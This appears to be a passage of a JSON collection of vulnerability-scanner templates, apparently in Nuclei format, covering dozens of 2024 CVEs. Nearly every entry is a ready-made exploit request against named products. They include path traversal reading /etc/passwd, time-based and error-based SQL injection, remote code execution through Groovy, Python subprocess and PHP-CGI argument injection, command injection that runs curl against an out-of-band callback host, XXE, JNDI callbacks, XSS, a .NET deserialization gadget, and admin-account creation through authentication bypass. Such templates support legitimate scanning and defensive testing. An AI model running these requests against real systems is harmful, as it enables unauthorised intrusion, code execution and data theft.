xmlns:a1=\"http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35\">\n<ForegroundBrush id=\"ref-3\">&#60;ObjectDataProvider MethodName=&#34;AddHeader&#34;\n  xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;\n  xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;\n  xmlns:System=&#34;clr-namespace:System;assembly=mscorlib&#34;\n  xmlns:System.Web=&#34;clr-namespace:System.Web;assembly=System.Web&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;&#60;ObjectDataProvider MethodName=&#34;get_Response&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;\n  &#60;ObjectDataProvider ObjectType=&#34;{x:Type System.Web:HttpContext}&#34; MethodName=&#34;get_Current&#34; /&#62;\n  &#60;/ObjectDataProvider.ObjectInstance&#62;\n  &#60;/ObjectDataProvider&#62;\n  &#60;/ObjectDataProvider.ObjectInstance&#62;\n  &#60;ObjectDataProvider.MethodParameters&#62;\n  &#60;System:String&#62;X-Vuln-Test&#60;/System:String&#62;\n  &#60;System:String&#62;{{randstr}}&#60;/System:String&#62;\n  &#60;/ObjectDataProvider.MethodParameters&#62;\n&#60;/ObjectDataProvider&#62;</ForegroundBrush>\n</a1:TextFormattingRunProperties>\n</SOAP-ENV:Envelope>\n"],"extractors":[{"type":"regex","name":"objref","part":"body_1","group":1,"regex":["(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"],"internal":true},{"type":"dsl","dsl":["x_vuln_test"]}],"matchers":[{"type":"dsl","dsl":["contains(body_1,'ObjRef')","contains(x_vuln_test,'{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2024-1728","info":{"name":"Gradio > 4.19.1 UploadButton - Path Traversal","severity":"high"},"requests":[{"raw":["POST /queue/join? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"data\":[[{\"path\":\"{{path}}\",\"url\":\"{{BaseURL}}/file=/help\",\"orig_name\":\"CHANGELOG.md\",\"size\":3549,\"mime_type\":\"text/markdown\"}]],\"event_data\":null,\"fn_index\":0,\"trigger_id\":2,\"session_hash\":\"{{randstr}}\"}\n","GET /queue/data?session_hash={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /file={{extracted_path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"extracted_path","regex":["/tmp/gradio/.*/passwd","C:.*\\win\\.ini"],"internal":true}],"payloads":{"path":["/etc/passwd","/windows/win.ini"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\") || regex(\"root:.*:0:0:\", body)","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-0881","info":{"name":"Combo Blocks < 2.2.76 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["User Profile Builder"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free","{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{\"html\"","\"<div class=","\"pagination\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23334","info":{"name":"aiohttp - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["aiohttp","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37843","info":{"name":"Craft CMS <=v3.7.31 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type:application/json\n\n{\"query\":\"query  IntrospectionQuery  {assets(orderBy: \\\"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\\\", limit: 5){filename}}\"}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General error: 1105 XPATH syntax error: '\\n{{matcher}}"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2024-36991","info":{"name":"Splunk Enterprise - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /en-US/login HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Splunk Inc.\")"],"condition":"and","internal":true}]},{"raw":["GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2024-0204","info":{"name":"Fortra GoAnywhere MFT - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Create an administrator account","goanywhere"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0235","info":{"name":"EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"_user_role=administrator","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@","status\":\"good","value=","\"content\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7593","info":{"name":"Ivanti vTM - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1\nHost: {{Hostname}}\n\n_form_submitted=form&create_user=Create&group=admin&newusername={{username}}&password1={{password}}&password2={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["wizardtitletext"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /apps/zxtm/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {[RootURL]}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarycznFUOqD0Y01A9B5\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: {{RootURL}}/apps/zxtm/login.cgi\n\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"_form_submitted\"\n\nform\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_username\"\n\n{{username}}\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_password\"\n\n{{password}}\n------WebKitFormBoundarycznFUOqD0Y01A9B5\nContent-Disposition: form-data; name=\"form_submit\"\n\nLogin\n------WebKitFormBoundarycznFUOqD0Y01A9B5--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: /apps/zxtm/","Set-Cookie: ZeusTMZAUTH=","Set-Cookie: ZeusTMZAUTHTIME="],"condition":"and"},{"type":"status","status":[302]}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-26331","info":{"name":"ReCrystallize Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Admin.aspx"],"headers":{"Cookie":"AdminUsername=admin"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ReCrystallize Server Administration","License Status:","System Info</a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-39914","info":{"name":"FOG Project < 1.5.10.34 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /management/export.php?filename=$(echo+'<?php+echo+md5({{num}});+?>'+>+{{filename}}.php)&type=pdf HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfogguiuser=fog&nojson=2\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"No HTML files!\",\"HTMLDOC\")","contains(content_type, \"application/pdf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /management/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-34061","info":{"name":"Changedetection.io <=v0.45.21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","is not a valid AppRise URL"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" value=\"([^\"]+)\""],"internal":true}]}]},{"id":"CVE-2024-8181","info":{"name":"Flowise <= 1.8.2 Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/apikey?/api/v1/ping HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nReferer: {{RootURL}}/document-stores\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiKey","apiSecret"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apiKey","part":"body","internal":false,"group":1,"regex":["\"apiKey\":\"([^\"]+)\""]}]}]},{"id":"CVE-2024-6893","info":{"name":"Journyx - XML External Entities Injection (XXE)","severity":"high"},"requests":[{"raw":["POST /jtcgi/soap_cgi.pyc HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM \"file:///etc/passwd\">]><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>{{pass}}</curpwd><newpwd>{{pass}}</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalid password for user"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27956","info":{"name":"WordPress Automatic Plugin <= 3.92.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nq=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(header, \"application/csv\")","contains_all(body, \"DATE\", \"ACTION\", \"KEYWORD\")"],"condition":"and"}]}]},{"id":"CVE-2024-38288","info":{"name":"TurboMeeting - Post-Authentication Command Injection","severity":"high"},"requests":[{"raw":["POST /as/wapi/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnext_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login\n"],"matchers":[{"type":"word","part":"body","words":["as/wapi/profile_entry?sid="],"internal":true}],"extractors":[{"type":"regex","name":"sid","part":"body","group":1,"regex":["sid=(.*?)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /as/wapi/generate_csr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsid={{sid}}&common_name=1\"%20out%20/dev/null\"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CSR","SSL"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-31750","info":{"name":"F-logic DataCube3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/pr_monitor/getting_index_data.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nreq_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq\")","contains(header, \"application/json\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-1512","info":{"name":"MasterStudy LMS WordPress Plugin <= 3.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(body,\"items\",\"total\",\"total_price\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-38856","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/main/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24809","info":{"name":"Traccar - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /api/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{name}}\", \"email\": \"{{email}}\", \"password\": \"{{password}}\", \"totpKey\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"administrator\":","\"fixedEmail\""],"condition":"and","internal":true}]},{"raw":["POST /api/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;charset=UTF-8\n\nemail={{email}}&password={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceReadonly\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{unique}}\", \"uniqueId\": \"{{unique}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"calendarId\"","\"groupId\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".id"]}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"extractors":[{"type":"regex","part":"body","name":"filename","internal":true,"regex":["device\\.([a-zA-Z]+)"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /api/devices/{{value}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": {{value}}, \"attributes\": {\"deviceImage\": \"device.png\"}, \"groupId\": 0, \"calendarId\": 0, \"name\": \"test\", \"uniqueId\": \"{{unique}}/../../../../../opt/traccar/modern\", \"status\": \"offline\", \"lastUpdate\": null, \"positionId\": 0, \"phone\": null, \"model\": null, \"contact\": null, \"category\": null, \"disabled\": false, \"expirationTime\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceImage\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]}]},{"id":"CVE-2024-29272","info":{"name":"VvvebJs < 1.7.5 - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfile=demo/landing/index.php&html={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"File saved\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /demo/landing/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4577","info":{"name":"PHP CGI - Argument Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"],"body":"<?php echo md5(\"CVE-2024-4577\"); ?>\n","stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["3f2ba4ab3b260f4c2dc61a6fac7c3e8a"]}]}]},{"id":"CVE-2024-3273","info":{"name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auth_state>1</auth_state>"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4443","info":{"name":"Business Directory Plugin <= 6.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1]= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"Business Directory\",\"No listings found\")"],"condition":"and"}]}]},{"id":"CVE-2024-21645","info":{"name":"pyload - Log Injection","severity":"medium"},"requests":[{"raw":["POST /login?next={{RootURL}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{randstr}}\\'%0a[1970-01-01 00:00:00]  INJECTED               {{str}}  THIS ENTRY HAS BEEN INJECTED&password=wrong&submit=Login\n","POST /login?next={{RootURL}}/logs HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{username}}&password={{password}}&submit=Login\n"],"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td>1970-01-01 00:00:00</td><td class=\"loglevel\">INJECTED</td><td class=\"logsource\">{{str}}</td><td>THIS&nbsp;ENTRY&nbsp;HAS&nbsp;BEEN&nbsp;INJECTED&#39;</td>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5975","info":{"name":"CZ Loan Management <= 1.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"CZ Loan Management\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cz_plugin_for_user_get_percentage&selectedperiod=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-22927","info":{"name":"eyoucms v.1.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=\"num\" value=\"1\"><ScRiPt >alert(document.domain)</ScRiPt>","id=\"eytime\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1071","info":{"name":"WordPress Ultimate Member 2.1.3 - 2.8.2 \u2013 SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains_all(body_2, \"current_page\", \"total_pages\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([0-9a-z]+)\""],"internal":true}]}]},{"id":"CVE-2024-1210","info":{"name":"LearnDash LMS < 4.10.2 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ldlms/v1/sfwd-quiz"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"quiz_materials\":","quizzes"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31849","info":{"name":"CData Connect < 23.4.8846 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["CData - Connect"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6782","info":{"name":"Calibre <= 7.14.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\n    [\"template\"],\n    \"\",\n    \"\",\n    \"\",\n    {{book_ids}},\n   \"python:def evaluate(a, b):\\n  import subprocess\\n  try:\\n    return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\\n  except Exception:\\n    return subprocess.check_output(['sh', '-c', 'whoami'])\\n\"\n]\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["b'([^']+)"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7332","info":{"name":"TOTOLINK CP450 v4.1.0cu.747_B20191224 - Hard-Coded Password Vulnerability","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_cste/cgi-bin/product.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"[PRODUCT]\",\"[WLAN]\",\"HostName\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-38514","info":{"name":"NextChat - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["__NEXT_DATA__"]}]}]},{"id":"CVE-2024-2330","info":{"name":"NS-ASG Application Security Gateway 6.3 - Sql Injection","severity":"medium"},"requests":[{"raw":["POST /protocol/index.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njsoncontent={\"protocolType\":\"addmacbind\",\"messagecontent\":[\"{\\\"BandIPMacId\\\":\\\"1\\\",\\\"IPAddr\\\":\\\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\\\",\\\"MacAddr\\\":\\\"\\\",\\\"DestIP\\\":\\\"\\\",\\\"DestMask\\\":\\\"255.255.255.0\\\",\\\"Description\\\":\\\"Sample+Description\\\"}\"]}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"XPATH syntax error:\",\"alert\") && contains(header,\"text/html\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["XPATH syntax error: '([~0-9.]+)'"]}]}]},{"id":"CVE-2024-5230","info":{"name":"FleetCart 4.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en/products?query=123"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"razorpayKeyId:\", \"loggedIn:\", \"storeName:\")","status_code == 200"],"condition":"and"},{"type":"word","words":["razorpayKeyId: ''"],"negative":true}]}]},{"id":"CVE-2024-27292","info":{"name":"Docassemble - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/interview?i=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[501]}]}]},{"id":"CVE-2024-22319","info":{"name":"IBM Operational Decision Manager - JNDI Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"patchLevel\\\":\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-24919","info":{"name":"Check Point Quantum Gateway - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /clients/MyCRL HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip\n\naCSHELL/../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*","nobody:.*"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2621","info":{"name":"Fujian Kelixin Communication - Command Injection","severity":"medium"},"requests":[{"raw":["@timeout 15s\nGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 